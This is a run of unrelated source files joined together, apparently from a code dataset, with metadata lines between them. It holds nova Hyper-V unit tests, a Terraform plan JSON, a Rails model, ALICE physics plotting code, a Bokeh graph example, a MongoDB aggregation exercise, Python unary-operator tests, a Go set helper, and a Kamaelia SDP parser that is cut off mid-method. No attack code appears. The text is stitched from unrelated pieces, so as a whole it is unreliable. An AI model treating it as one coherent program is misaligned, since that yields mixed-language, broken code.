attrs = {'ElementName': 'fake_name',
'Notes': '4f54fb69-d3a2-45b7-bb9b-b6e6b3d893b3'}
vs.configure_mock(**attrs)
vs2 = mock.MagicMock(ElementName='fake_name2', Notes=None)
self._vmutils._conn.Msvm_VirtualSystemSettingData.return_value = [vs,
vs2]
response = self._vmutils.list_instance_notes()
self.assertEqual([(attrs['ElementName'], [attrs['Notes']])], response)
self._vmutils._conn.Msvm_VirtualSystemSettingData.assert_called_with(
['ElementName', 'Notes'],
SettingType=self._vmutils._VIRTUAL_SYSTEM_CURRENT_SETTINGS)
@mock.patch('nova.virt.hyperv.vmutils.VMUtils.check_ret_val')
def test_modify_virtual_system(self, mock_check_ret_val):
mock_vs_man_svc = mock.MagicMock()
mock_vmsetting = mock.MagicMock()
fake_path = 'fake path'
fake_job_path = 'fake job path'
fake_ret_val = 'fake return value'
mock_vs_man_svc.ModifyVirtualSystem.return_value = (0, fake_job_path,
fake_ret_val)
self._vmutils._modify_virtual_system(vs_man_svc=mock_vs_man_svc,
vm_path=fake_path,
vmsetting=mock_vmsetting)
mock_vs_man_svc.ModifyVirtualSystem.assert_called_once_with(
ComputerSystem=fake_path,
SystemSettingData=mock_vmsetting.GetText_(1))
mock_check_ret_val.assert_called_once_with(fake_ret_val, fake_job_path)
@mock.patch('nova.virt.hyperv.vmutils.VMUtils.check_ret_val')
@mock.patch('nova.virt.hyperv.vmutils.VMUtils._get_wmi_obj')
@mock.patch('nova.virt.hyperv.vmutils.VMUtils._modify_virtual_system')
@mock.patch('nova.virt.hyperv.vmutils.VMUtils._get_vm_setting_data')
def test_create_vm_obj(self, mock_get_vm_setting_data,
mock_modify_virtual_system,
mock_get_wmi_obj, mock_check_ret_val):
mock_vs_man_svc = mock.MagicMock()
mock_vs_gs_data = mock.MagicMock()
fake_vm_path = 'fake vm path'
fake_job_path = 'fake job path'
fake_ret_val = 'fake return value'
_conn = self._vmutils._conn.Msvm_VirtualSystemGlobalSettingData
_conn.new.return_value = mock_vs_gs_data
mock_vs_man_svc.DefineVirtualSystem.return_value = (fake_vm_path,
fake_job_path,
fake_ret_val)
response = self._vmutils._create_vm_obj(
vs_man_svc=mock_vs_man_svc,
vm_name='fake vm', vm_gen='fake vm gen',
notes='fake notes', dynamic_memory_ratio=1.0,
instance_path=mock.sentinel.instance_path)
_conn.new.assert_called_once_with()
self.assertEqual(mock_vs_gs_data.ElementName, 'fake vm')
mock_vs_man_svc.DefineVirtualSystem.assert_called_once_with(
[], None, mock_vs_gs_data.GetText_(1))
mock_check_ret_val.assert_called_once_with(fake_ret_val, fake_job_path)
self.assertEqual(mock.sentinel.instance_path,
mock_vs_gs_data.ExternalDataRoot)
self.assertEqual(mock.sentinel.instance_path,
mock_vs_gs_data.SnapshotDataRoot)
mock_get_wmi_obj.assert_called_with(fake_vm_path)
mock_get_vm_setting_data.assert_called_once_with(mock_get_wmi_obj())
mock_modify_virtual_system.assert_called_once_with(
mock_vs_man_svc, fake_vm_path, mock_get_vm_setting_data())
self.assertEqual(mock_get_vm_setting_data().Notes,
'\n'.join('fake notes'))
self.assertEqual(response, mock_get_wmi_obj())
def test_list_instances(self):
vs = mock.MagicMock()
attrs = {'ElementName': 'fake_name'}
vs.configure_mock(**attrs)
self._vmutils._conn.Msvm_VirtualSystemSettingData.return_value = [vs]
response = self._vmutils.list_instances()
self.assertEqual([(attrs['ElementName'])], response)
self._vmutils._conn.Msvm_VirtualSystemSettingData.assert_called_with(
['ElementName'],
SettingType=self._vmutils._VIRTUAL_SYSTEM_CURRENT_SETTINGS)
@mock.patch.object(vmutils.VMUtils, "_clone_wmi_obj")
def _test_check_clone_wmi_obj(self, mock_clone_wmi_obj, clone_objects):
mock_obj = mock.MagicMock()
self._vmutils._clone_wmi_objs = clone_objects
response = self._vmutils._check_clone_wmi_obj(class_name="fakeClass",
obj=mock_obj)
if not clone_objects:
self.assertEqual(mock_obj, response)
else:
mock_clone_wmi_obj.assert_called_once_with("fakeClass", mock_obj)
self.assertEqual(mock_clone_wmi_obj.return_value, response)
def test_check_clone_wmi_obj_true(self):
self._test_check_clone_wmi_obj(clone_objects=True)
def test_check_clone_wmi_obj_false(self):
self._test_check_clone_wmi_obj(clone_objects=False)
def test_clone_wmi_obj(self):
mock_obj = mock.MagicMock()
mock_value = mock.MagicMock()
mock_value.Value = mock.sentinel.fake_value
mock_obj._properties = [mock.sentinel.property]
mock_obj.Properties_.Item.return_value = mock_value
response = self._vmutils._clone_wmi_obj(
class_name="FakeClass", obj=mock_obj)
compare = self._vmutils._conn.FakeClass.new()
self.assertEqual(mock.sentinel.fake_value,
compare.Properties_.Item().Value)
self.assertEqual(compare, response)
def test_get_attached_disks(self):
mock_scsi_ctrl_path = mock.MagicMock()
expected_query = ("SELECT * FROM %(class_name)s "
"WHERE (ResourceSubType='%(res_sub_type)s' OR "
"ResourceSubType='%(res_sub_type_virt)s')"
" AND Parent='%(parent)s'" %
{"class_name":
self._vmutils._RESOURCE_ALLOC_SETTING_DATA_CLASS,
"res_sub_type":
self._vmutils._PHYS_DISK_RES_SUB_TYPE,
"res_sub_type_virt":
self._vmutils._DISK_DRIVE_RES_SUB_TYPE,
"parent":
mock_scsi_ctrl_path.replace("'", "''")})
expected_disks = self._vmutils._conn.query.return_value
ret_disks = self._vmutils.get_attached_disks(mock_scsi_ctrl_path)
self._vmutils._conn.query.assert_called_once_with(expected_query)
self.assertEqual(expected_disks, ret_disks)
def _get_fake_instance_notes(self):
return self._FAKE_VM_UUID
def test_instance_notes(self):
self._lookup_vm()
mock_vm_settings = mock.Mock()
mock_vm_settings.Notes = self._get_fake_instance_notes()
self._vmutils._get_vm_setting_data = mock.Mock(
return_value=mock_vm_settings)
notes = self._vmutils._get_instance_notes(mock.sentinel.vm_name)
self.assertEqual(notes[0], self._FAKE_VM_UUID)
def test_get_event_wql_query(self):
cls = self._vmutils._COMPUTER_SYSTEM_CLASS
field = self._vmutils._VM_ENABLED_STATE_PROP
timeframe = 10
filtered_states = [constants.HYPERV_VM_STATE_ENABLED,
constants.HYPERV_VM_STATE_DISABLED]
expected_checks = ' OR '.join(
["TargetInstance.%s = '%s'" % (field, state)
for state in filtered_states])
expected_query = (
"SELECT %(field)s, TargetInstance "
"FROM __InstanceModificationEvent "
"WITHIN %(timeframe)s "
"WHERE TargetInstance ISA '%(class)s' "
"AND TargetInstance.%(field)s != "
"PreviousInstance.%(field)s "
"AND (%(checks)s)" %
{'class': cls,
'field': field,
'timeframe': timeframe,
'checks': expected_checks})
query = self._vmutils._get_event_wql_query(
cls=cls, field=field, timeframe=timeframe,
filtered_states=filtered_states)
self.assertEqual(expected_query, query)
def test_get_vm_power_state_change_listener(self):
with mock.patch.object(self._vmutils,
'_get_event_wql_query') as mock_get_query:
listener = self._vmutils.get_vm_power_state_change_listener(
mock.sentinel.timeframe,
mock.sentinel.filtered_states)
mock_get_query.assert_called_once_with(
cls=self._vmutils._COMPUTER_SYSTEM_CLASS,
field=self._vmutils._VM_ENABLED_STATE_PROP,
timeframe=mock.sentinel.timeframe,
filtered_states=mock.sentinel.filtered_states)
watcher = self._vmutils._conn.Msvm_ComputerSystem.watch_for
watcher.assert_called_once_with(
raw_wql=mock_get_query.return_value,
fields=[self._vmutils._VM_ENABLED_STATE_PROP])
self.assertEqual(watcher.return_value, listener)
|
unknown
|
codeparrot/codeparrot-clean
| ||
{
"applyable": true,
"complete": true,
"configuration": {
"provider_config": {
"tfcoremock": {
"full_name": "registry.terraform.io/hashicorp/tfcoremock",
"name": "tfcoremock",
"version_constraint": "0.1.1"
}
},
"root_module": {
"resources": [
{
"address": "tfcoremock_object.object",
"expressions": {
"id": {
"constant_value": "F40F2AB4-100C-4AE8-BFD0-BF332A158415"
},
"object": {
"constant_value": {
"id": "07F887E2-FDFF-4B2E-9BFB-B6AA4A05EDB9"
}
}
},
"mode": "managed",
"name": "object",
"provider_config_key": "tfcoremock",
"schema_version": 0,
"type": "tfcoremock_object"
}
]
}
},
"errored": false,
"format_version": "1.2",
"planned_values": {
"root_module": {
"resources": [
{
"address": "tfcoremock_object.object",
"mode": "managed",
"name": "object",
"provider_name": "registry.terraform.io/hashicorp/tfcoremock",
"schema_version": 0,
"sensitive_values": {
"object": {}
},
"type": "tfcoremock_object",
"values": {
"id": "F40F2AB4-100C-4AE8-BFD0-BF332A158415",
"object": {
"id": "07F887E2-FDFF-4B2E-9BFB-B6AA4A05EDB9"
}
}
}
]
}
},
"prior_state": {
"format_version": "1.0",
"values": {
"root_module": {
"resources": [
{
"address": "tfcoremock_object.object",
"mode": "managed",
"name": "object",
"provider_name": "registry.terraform.io/hashicorp/tfcoremock",
"schema_version": 0,
"sensitive_values": {
"object": {}
},
"type": "tfcoremock_object",
"values": {
"id": "F40F2AB4-100C-4AE8-BFD0-BF332A158415",
"object": {
"id": "56C7E07F-B9DF-4799-AF62-E703D1167A51"
}
}
}
]
}
}
},
"resource_changes": [
{
"action_reason": "replace_because_cannot_update",
"address": "tfcoremock_object.object",
"change": {
"actions": [
"delete",
"create"
],
"after": {
"id": "F40F2AB4-100C-4AE8-BFD0-BF332A158415",
"object": {
"id": "07F887E2-FDFF-4B2E-9BFB-B6AA4A05EDB9"
}
},
"after_sensitive": {
"object": {}
},
"after_unknown": {},
"before": {
"id": "F40F2AB4-100C-4AE8-BFD0-BF332A158415",
"object": {
"id": "56C7E07F-B9DF-4799-AF62-E703D1167A51"
}
},
"before_sensitive": {
"object": {}
},
"replace_paths": [
[
"object",
"id"
]
]
},
"mode": "managed",
"name": "object",
"provider_name": "registry.terraform.io/hashicorp/tfcoremock",
"type": "tfcoremock_object"
}
]
}
|
json
|
github
|
https://github.com/hashicorp/terraform
|
testing/equivalence-tests/outputs/replace_within_object/plan.json
|
# frozen_string_literal: true
class Organization < ActiveRecord::Base
has_many :member_details
has_many :members, through: :member_details
has_many :authors, primary_key: :name
has_many :author_essay_categories, through: :authors, source: :essay_categories
has_one :author, primary_key: :name
has_one :author_owned_essay_category, through: :author, source: :owned_essay_category
has_many :posts, through: :author, source: :posts
scope :clubs, -> { from("clubs") }
end
|
ruby
|
github
|
https://github.com/rails/rails
|
activerecord/test/models/organization.rb
|
#**************************************************************************
#* Copyright(c) 1998-2014, ALICE Experiment at CERN, All rights reserved. *
#* *
#* Author: The ALICE Off-line Project. *
#* Contributors are mentioned in the code where appropriate. *
#* *
#* Permission to use, copy, modify and distribute this software and its *
#* documentation strictly for non-commercial purposes is hereby granted *
#* without fee, provided that the above copyright notice appears in all *
#* copies and that both the copyright notice and this permission notice *
#* appear in the supporting documentation. The authors make no claims *
#* about the suitability of this software for any purpose. It is *
#* provided "as is" without express or implied warranty. *
#**************************************************************************
"""
Comparison plot for spectra in different pt-hat bins
@author: Markus Fasel
"""
from PWG.PWGJE.EMCALJetTasks.Tracks.analysis.base.Graphics import SinglePanelPlot, Style, GraphicsObject, Frame
from PWG.PWGJE.EMCALJetTasks.Tracks.analysis.base.ComparisonData import ComparisonPlot, ComparisonData, ComparisonObject
from PWG.PWGJE.EMCALJetTasks.Tracks.analysis.base.SpectraSum import SpectraSum
from ROOT import kBlack
class MCSpectrumPtHatBin(ComparisonObject):
"""
Entry class of a spectrum for a given pt-hat bin
"""
def __init__(self, pthatbin, spectrum, style = None):
"""
Constructor
"""
ComparisonObject.__init__(self, spectrum, style)
self.__pthatbin = pthatbin
def GetLegendTitle(self):
return "Pt-hat bin %d" %(self.__pthatbin)
def GetObjectName(self):
return "SpectrumPtHat%d" %(self.__pthatbin)
class MCSpectrumContainer(ComparisonData):
"""
Container class for spectra in different pt-hat bins
"""
def __init__(self):
"""
Constructor, initialising list of bins
"""
ComparisonData.__init__(self)
def AddPtHatBin(self, pthatbin, spectrum, style = None):
"""
Add new pt-hat bin to the container
"""
self.AddEntry(MCSpectrumPtHatBin(pthatbin, spectrum, style))
def GetSpectraSum(self):
"""
sum up the spectra in different pt-hard bins
"""
summer = SpectraSum()
for pthatbin in self.GetEntries():
summer.AddSpectrum(pthatbin.GetData())
return summer.GetSummedSpectrum()
def DrawObjects(self, pad, addtolegend = True):
"""
Draw all spectra inside the container into a given pad
"""
ComparisonData.DrawObjects(self, pad, addtolegend)
# draw also sum of the different bins
pad.DrawGraphicsObject(GraphicsObject(self.GetSpectraSum(), Style(kBlack, 20)), addtolegend, "Sum")
class WeightedPtSpectrumFrame(Frame):
def __init__(self):
Frame.__init__(self, "sframe", 0., 100., 1e-20, 1e-5)
self.SetXtitle("p_{t} (GeV/c)")
self.SetYtitle("d#sigma/dp_{t} (mb/(GeV/c))" )
class WeightedEnergySpectrumFrame(Frame):
def __init__(self):
Frame.__init__(self, "eframe", 0., 100., 1e-20, 1e-5)
self.SetXtitle("E (GeV)")
self.SetYtitle("d#sigma/dE (mb/GeV)" )
class MCSpectrumPlot(ComparisonPlot):
"""
Comparison plot of spectra for different pt-hat bins
"""
def __init__(self, plottype = "tracks"):
"""
Constructor
"""
ComparisonPlot.__init__(self)
self._comparisonContainer = MCSpectrumContainer()
self._canvasname = ""
self._canvastitle = ""
self.__labeltext = "MC-true spectrum"
if plottype == "tracks":
self.SetFrame(WeightedPtSpectrumFrame())
else:
self.SetFrame(WeightedEnergySpectrumFrame())
def SetLabelText(self, text):
"""
Change text of the label
"""
self.__labeltext = text
def AddMCSpectrum(self, pthatbin, spectrum, style = None):
"""
Add new spectrum in pt-hat bin to the plot
"""
self._comparisonContainer.AddPtHatBin(pthatbin, spectrum, style)
def Create(self):
"""
Create the plot
"""
self.SetPadAttributes(True, True, False, False)
self.SetLegendAttributes(0.7, 0.5, 0.89, 0.89)
self._Create(self._canvasname, self._canvastitle)
pad = self._GetFramedPad()
pad.DrawLabel(0.15, 0.15, 0.45, 0.21, self.__labeltext)
class MCTrueSpectrumPlot(MCSpectrumPlot):
def __init__(self, plottype = "tracks"):
MCSpectrumPlot.__init__(self, plottype)
self._canvasname = "MCtruthPlot"
self._canvastitle = "Plot of MC-true spectra"
self.SetLabelText("MC-true spectrum")
class MCRecSpectrumPlot(MCSpectrumPlot):
def __init__(self, triggername, plottype = "tracks"):
MCSpectrumPlot.__init__(self)
self._canvasname = "MCrecPlot%s" %(triggername)
self._canvastitle = "Plot of MC-reconstructed spectra for trigger %s" %(triggername)
self.SetLabelText("MC-reconstructed spectrum for trigger %s" %(triggername))
class MCWeightPlot(SinglePanelPlot):
"""
Class for the plot of the weights for different pt-hard bins
"""
def __init__(self, weights):
"""
Constructor
"""
SinglePanelPlot.__init__(self)
self.__points = weights
def Create(self):
"""
Creator function for the plot
"""
self._OpenCanvas("weightplot", "Monte-Carlo weights")
pad = self._GetFramedPad()
pad.GetPad().SetLogy()
frame = Frame("wframe", 0., 11., 1e-12, 1e-5)
frame.SetXtitle("p_{t,hard} bin")
frame.SetYtitle("weight factor")
pad.DrawFrame(frame)
pad.DrawGraphicsObject(GraphicsObject(self.__points.GetWeightingCurve(), Style(kBlack, 20)), False, "weights")
|
unknown
|
codeparrot/codeparrot-clean
| ||
// Copyright (c) HashiCorp, Inc.
// SPDX-License-Identifier: BUSL-1.1
package promising
type ptrSet[T any] map[*T]struct{}
func (s ptrSet[T]) Add(p *T) {
s[p] = struct{}{}
}
func (s ptrSet[T]) Remove(p *T) {
delete(s, p)
}
func (s ptrSet[T]) Has(p *T) bool {
_, ret := s[p]
return ret
}
type promiseSet = ptrSet[promise]
|
go
|
github
|
https://github.com/hashicorp/terraform
|
internal/promising/ptr_set.go
|
from bokeh.models import StaticLayoutProvider, ColumnDataSource, HoverTool, TapTool
from bokeh.models.graphs import NodesAndLinkedEdges
from bokeh.palettes import Set3_12
from bokeh.plotting import figure, show, output_file
from bokeh.sampledata.us_states import data as us_states
from bokeh.sampledata.airport_routes import airports, routes
import numpy as np
output_file("graphs.html")
airports.set_index("AirportID", inplace=True)
airports.index.rename("index", inplace=True)
routes.rename(columns={"SourceID": "start", "DestinationID": "end"}, inplace=True)
lats, lons = [], []
for k, v in us_states.items():
lats.append(np.array(v['lats']))
lons.append(np.array(v['lons']))
source = ColumnDataSource(data=dict(lats=lats, lons=lons))
graph_layout = dict(zip(airports.index.astype(str), zip(airports.Longitude, airports.Latitude)))
layout_provider = StaticLayoutProvider(graph_layout=graph_layout)
fig = figure(x_range=(-180, -60), y_range=(15,75),
x_axis_label="Longitude", y_axis_label="Latitude",
plot_width=800, plot_height=600, background_fill_color=Set3_12[4],
background_fill_alpha=0.2, tools='box_zoom,reset')
fig.patches(xs="lons", ys="lats", line_color='grey', line_width=1.0,
fill_color=Set3_12[10], source=source)
r = fig.graph(airports, routes, layout_provider,
## node style props
node_fill_color=Set3_12[3], node_fill_alpha=0.4, node_line_color="black", node_line_alpha=0.3,
node_nonselection_fill_color=Set3_12[3], node_nonselection_fill_alpha=0.2, node_nonselection_line_alpha=0.1,
node_selection_fill_color=Set3_12[3], node_selection_fill_alpha=0.8, node_selection_line_alpha=0.3,
## edge style props
edge_line_color="black", edge_line_alpha=0.04,
edge_hover_line_alpha=0.6, edge_hover_line_color=Set3_12[1],
edge_nonselection_line_color="black", edge_nonselection_line_alpha=0.01,
edge_selection_line_alpha=0.6, edge_selection_line_color=Set3_12[1],
## graph policies
inspection_policy=NodesAndLinkedEdges(), selection_policy=NodesAndLinkedEdges())
hover = HoverTool(tooltips=[("Airport", "@Name (@IATA), @City ")], renderers=[r])
tap = TapTool(renderers=[r])
fig.add_tools(hover, tap)
show(fig)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
"""
In an earlier exercise we looked at the cities dataset and asked which region in India contains
the most cities. In this exercise, we'd like you to answer a related question regarding regions in
India. What is the average city population for a region in India? Calculate your answer by first
finding the average population of cities in each region and then by calculating the average of the
regional averages.
Hint: If you want to accumulate using values from all input documents to a group stage, you may use
a constant as the value of the "_id" field. For example,
{ "$group" : "India Regional City Population Average",
... }
Please modify only the 'make_pipeline' function so that it creates and returns an aggregation
pipeline that can be passed to the MongoDB aggregate function. As in our examples in this lesson,
the aggregation pipeline should be a list of one or more dictionary objects.
Please review the lesson examples if you are unsure of the syntax.
Your code will be run against a MongoDB instance that we have provided. If you want to run this code
locally on your machine, you have to install MongoDB, download and insert the dataset.
For instructions related to MongoDB setup and datasets please see Course Materials.
Please note that the dataset you are using here is a smaller version of the twitter dataset used
in examples in this lesson. If you attempt some of the same queries that we looked at in the lesson
examples, your results will be different.
"""
def get_db(db_name):
from pymongo import MongoClient
client = MongoClient('localhost:27017')
db = client[db_name]
return db
def make_pipeline():
# complete the aggregation pipeline
pipeline = [{"$match": {"country": "India"}},
{"$unwind": "$isPartOf"},
{"$group": {"_id": "$isPartOf", "avg": {"$avg": "$population"}}},
{"$group": {"_id": "avg", "avg": {"$avg": "$avg"}}}]
return pipeline
def aggregate(db, pipeline):
result = db.cities.aggregate(pipeline)
return result
if __name__ == '__main__':
db = get_db('examples')
pipeline = make_pipeline()
result = aggregate(db, pipeline)
assert len(result["result"]) == 1
assert result["result"][0]["avg"] == 196025.97814809752
import pprint
pprint.pprint(result)
|
unknown
|
codeparrot/codeparrot-clean
| ||
"""Test compiler changes for unary ops (+, -, ~) introduced in Python 2.2"""
import unittest
from test.test_support import run_unittest, have_unicode
class UnaryOpTestCase(unittest.TestCase):
def test_negative(self):
self.assert_(-2 == 0 - 2)
self.assert_(-0 == 0)
self.assert_(--2 == 2)
self.assert_(-2L == 0 - 2L)
self.assert_(-2.0 == 0 - 2.0)
self.assert_(-2j == 0 - 2j)
def test_positive(self):
self.assert_(+2 == 2)
self.assert_(+0 == 0)
self.assert_(++2 == 2)
self.assert_(+2L == 2L)
self.assert_(+2.0 == 2.0)
self.assert_(+2j == 2j)
def test_invert(self):
self.assert_(-2 == 0 - 2)
self.assert_(-0 == 0)
self.assert_(--2 == 2)
self.assert_(-2L == 0 - 2L)
def test_no_overflow(self):
nines = "9" * 32
self.assert_(eval("+" + nines) == eval("+" + nines + "L"))
self.assert_(eval("-" + nines) == eval("-" + nines + "L"))
self.assert_(eval("~" + nines) == eval("~" + nines + "L"))
def test_negation_of_exponentiation(self):
# Make sure '**' does the right thing; these form a
# regression test for SourceForge bug #456756.
self.assertEqual(-2 ** 3, -8)
self.assertEqual((-2) ** 3, -8)
self.assertEqual(-2 ** 4, -16)
self.assertEqual((-2) ** 4, 16)
def test_bad_types(self):
for op in '+', '-', '~':
self.assertRaises(TypeError, eval, op + "'a'")
if have_unicode:
self.assertRaises(TypeError, eval, op + "u'a'")
self.assertRaises(TypeError, eval, "~2j")
self.assertRaises(TypeError, eval, "~2.0")
def test_main():
    # Entry point used by CPython's regrtest harness (test.test_support).
    run_unittest(UnaryOpTestCase)

if __name__ == "__main__":
    test_main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
"""\
==========================================
Session Description Protocol (SDP) Support
==========================================
The SDPParser component parses Session Description Protocol (see `RFC 4566`_) data
sent to it as individual lines of text (not multiline strings) and outputs a
dictionary containing the parsed session description.
.. _`RFC 4566`: http://tools.ietf.org/html/rfc4566
Example Usage
-------------
Fetch SDP data from a URL, parse it, and display the output::
Pipeline( OneShot("http://www.mysite.com/sessiondescription.sdp"),
SimpleHTTPClient(),
chunks_to_lines(),
SDPParser(),
ConsoleEchoer(),
).run()
If the session description at the URL provided is this::
v=0
o=jdoe 2890844526 2890842807 IN IP4 10.47.16.5
s=SDP Seminar
i=A Seminar on the session description protocol
u=http://www.example.com/seminars/sdp.pdf
e=j.doe@example.com (Jane Doe)
c=IN IP4 224.2.17.12/127
t=2873397496 2873404696
a=recvonly
m=audio 49170 RTP/AVP 0
m=video 51372 RTP/AVP 99
a=rtpmap:99 h263-1998/90000
Then parsing will return this dictionary::
{ 'protocol_version': 0,
'origin' : ('jdoe', 2890844526, 2890842807, 'IN', 'IP4', '10.47.16.5'),
'sessionname': 'SDP Seminar',
'information': 'A Seminar on the session description protocol',
'connection' : ('IN', 'IP4', '224.2.17.12', '127', 1),
'time' : [(2873397496L, 2873404696L, [])],
'URI' : 'http://www.example.com/seminars/sdp.pdf',
'email' : 'j.doe@example.com (Jane Doe)',
'attribute' : ['recvonly'],
'media':
[ { 'media' : ('audio', 49170, 1, 'RTP/AVP', '0'),
'connection': ('IN', 'IP4', '224.2.17.12', '127', 1)
},
{ 'media' : ('video', 51372, 1, 'RTP/AVP', '99'),
'connection': ('IN', 'IP4', '224.2.17.12', '127', 1),
'attribute' : ['rtpmap:99 h263-1998/90000']
}
],
}
Behaviour
---------
Send individual lines as strings to SDPParser's "inbox" inbox. SDPParser cannot
handle multiple lines in the same string.
When SDPParser receives a producerFinished() message on its "control" inbox, or
if it encounters another "v=" line then it knows it has reached the end of the
SDP data and will output the parsed data as a dictionary to its "outbox" outbox.
The SDP format does *not* contain any kind of marker to signify the end of a
session description - so SDPParser only deduces this by being told that the
producer/data source has finished, or if it encounters a "v=" line indicating
the start of another session description.
SDPParser can parse more than one session description, one after the other.
If the SDP data is malformed AssertionError, or other exceptions, may be raised.
SDPParser does not rigorously test for exact compliance - it just complains if
there are glaring problems, such as fields appearing in the wrong sections!
If a producerFinished or shutdownMicroprocess message is received on the
"control" inbox then, once any pending data at the "inbox" inbox has been
processed, this component will terminate. It will send the message on out of
its "signal" outbox.
Only if the message is a producerFinished message will it output the session
description it has been parsing. A shutdownMicroprocess message will not result
in it being output.
Format of parsed output
-----------------------
The result of parsing SDP data is a dictionary mapping descriptive names of
types to values:
====== ====================== ======================================================================
Session Description
------------------------------------------------------------------------------------------------------
Type Dictionary key Format of the value
====== ====================== ======================================================================
v "protocol_version" version_number
o "origin" ("user", session_id, session_version, "net_type", "addr_type", "addr")
s "sessionname" "session name"
t & r "time" (starttime, stoptime, [repeat,repeat, ...])
where repeat = (interval,duration,[offset,offset, ...])
a "attribute" "value of attribute"
b "bandwidth" (mode, bitspersecond)
i "information" "value"
e "email" "email-address"
u "URI" "uri"
p "phone" "phone-number"
c "connection" ("net_type", "addr_type", "addr", ttl, groupsize)
z "timezone adjustments" [(adj-time,offset), (adj-time,offset), ...]
k "encryption" ("method","value")
m "media" [media-description, media-description, ... ]
see next table for media description structure
====== ====================== ======================================================================
Note that 't' and 'r' lines are combined in the dictionary into a single
"time" key containing both the start and end times specified in the 't' line
and a list of any repeats specified in any 'r' lines present.
The "media" key contains a list of media descriptions. Like for the overall
session description, each is parsed into a dictionary, that will contain some
or all of the following:
====== ====================== ======================================================================
Media Descriptions
------------------------------------------------------------------------------------------------------
Type Dictionary key Format of the value
====== ====================== ======================================================================
m "media" ("media-type", port-number, number-of-ports, "protocol", "format")
c "connection" ("net_type", "addr_type", "addr", ttl, groupsize)
b "bandwidth" (mode, bitspersecond)
i "information" "value"
k "encryption" ("method","value")
a "attribute" "value of attribute"
====== ====================== ======================================================================
Some lines are optional in SDP. If they are not included, then the parsed output
will not contain the corresponding key.
The formats of values are left unchanged by the parsing. For example, integers
representing times are simply converted to integers, but the units used remain
unchanged (ie. they will not be converted to unix time units).
"""
# Basic Parser for SDP data, as defined in RFC 4566
#
# assuming the data is already split into lines
#
# ignores attribute lines to simplify parsing
from Axon.Component import component
from Axon.Ipc import producerFinished,shutdownMicroprocess
import re
class AllDone(Exception):
    # Internal control-flow signal: the upstream producer has finished, so
    # flush any complete session description and shut down cleanly.
    pass

class ShutdownNow(Exception):
    # Internal control-flow signal: immediate shutdown requested; any
    # partially parsed session description is discarded.
    pass
class SDPParser(component):
    """\
    SDPParser() -> new SDPParser component.
    Parses Session Description Protocol data (see RFC 4566) sent to its "inbox"
    inbox as individual strings for each line of the SDP data. Outputs a dict
    containing the parsed data from its "outbox" outbox.
    """
    Inboxes = { "inbox"   : "SDP data in strings, each containing a single line",
                "control" : "Shutdown signalling",
              }
    Outboxes = { "outbox" : "Parsed SDP data in a dictionary",
                 "signal" : "Shutdown signalling",
               }

    def handleControl(self):
        # Drain the "control" inbox, converting shutdown requests into
        # exceptions that unwind main()'s parsing loops:
        #   producerFinished     -> AllDone (flush a complete session, stop)
        #   shutdownMicroprocess -> ShutdownNow (stop without flushing)
        # Any other message is forwarded unchanged on "signal".
        while self.dataReady("control"):
            msg = self.recv("control")
            if isinstance(msg,producerFinished):
                self.shutdownMsg = msg
                raise AllDone
            elif isinstance(msg,shutdownMicroprocess):
                self.shutdownMsg = msg
                raise ShutdownNow
            else:
                self.send(msg,"signal")

    def readline(self):
        # Generator used via "for line in self.readline(): yield 1".
        # It yields None (letting the caller re-yield control to the Axon
        # scheduler) until a non-empty line arrives, then yields that line
        # once and returns - so after the caller's for-loop finishes, its
        # 'line' variable holds the real line.  Empty lines are skipped.
        while 1:
            if self.dataReady("inbox"):
                line = self.recv("inbox")
                if line != "":
                    yield line
                    return
            self.handleControl()
            self.pause()
            yield None

    def main(self):
        self.shutdownMsg = None
        session = {}
        # Non-empty dummy value so an AllDone before any parsing does not
        # flush an empty session (see the AllDone handler below).
        mandatory = "XXX"
        try:
            for line in self.readline(): yield 1
            # self.readline() generator complete ... line now contains a line with something on it
            type,key,value = _parseline(line)

            while 1:
                # begin by parsing the session section
                session = {}
                mandatory = "vost"              # field types that MUST appear
                multiple_allowed = "abtr"       # field types that may repeat
                single_allowed = "vosiuepcbzk"  # field types allowed at most once
                most_recent_t = None

                while type != "m":
                    # check to see if we've been getting SDP data, then another 'v' has come along
                    # signifying the start of a new one
                    if type=="v" and "v" not in mandatory:
                        break
                    mandatory=mandatory.replace(type,"")
                    assert((type in single_allowed) or (type in multiple_allowed))
                    single_allowed=single_allowed.replace(type,"")

                    if type in multiple_allowed:
                        if type=="r":
                            assert(most_recent_t is not None)
                            most_recent_t[2].append(value) # tag repeats into list on end of time field
                        else:
                            session[key] = session.get(key,[])
                            session[key].append(value)
                    else:
                        session[key] = value

                    for line in self.readline(): yield 1
                    # self.readline() generator complete ... line now contains a line with something on it
                    type,key,value = _parseline(line)

                # we've hit an 'm' so its the end of the session section
                assert(mandatory=="")

                # now move onto media sections
                mandatory_additional=""
                if "c" in single_allowed:
                    # no session-level 'c' line was seen, so every media
                    # section must provide its own connection line
                    mandatory_additional+="c"

                session['media'] = []

                # do a media section
                while type=="m":
                    mandatory = "" + mandatory_additional
                    multiple_allowed = "a"
                    single_allowed = "icbk"

                    media={key:value}
                    session['media'].append(media)

                    for line in self.readline(): yield 1
                    # self.readline() generator complete ... line now contains a line with something on it
                    type,key,value = _parseline(line)

                    while type != "m" and type != "v":
                        mandatory=mandatory.replace(type,"")
                        assert((type in single_allowed) or (type in multiple_allowed))
                        single_allowed=single_allowed.replace(type,"")

                        if type in multiple_allowed:
                            media[key] = media.get(key,[])
                            media[key].append(value)
                        else:
                            media[key] = value

                        for line in self.readline(): yield 1
                        # self.readline() generator complete ... line now contains a line with something on it
                        type,key,value = _parseline(line)

                    # end of media section
                    assert(mandatory=="")

                # end of complete SDP file (we've hit another 'v' signifying the start of a new one)
                self.sendOutParsedSDP(session)

        except AllDone:
            # Producer finished: only emit the session if all mandatory
            # fields of the section being parsed were seen.
            if mandatory=="":
                self.sendOutParsedSDP(session)
            yield 1
        except ShutdownNow:
            pass

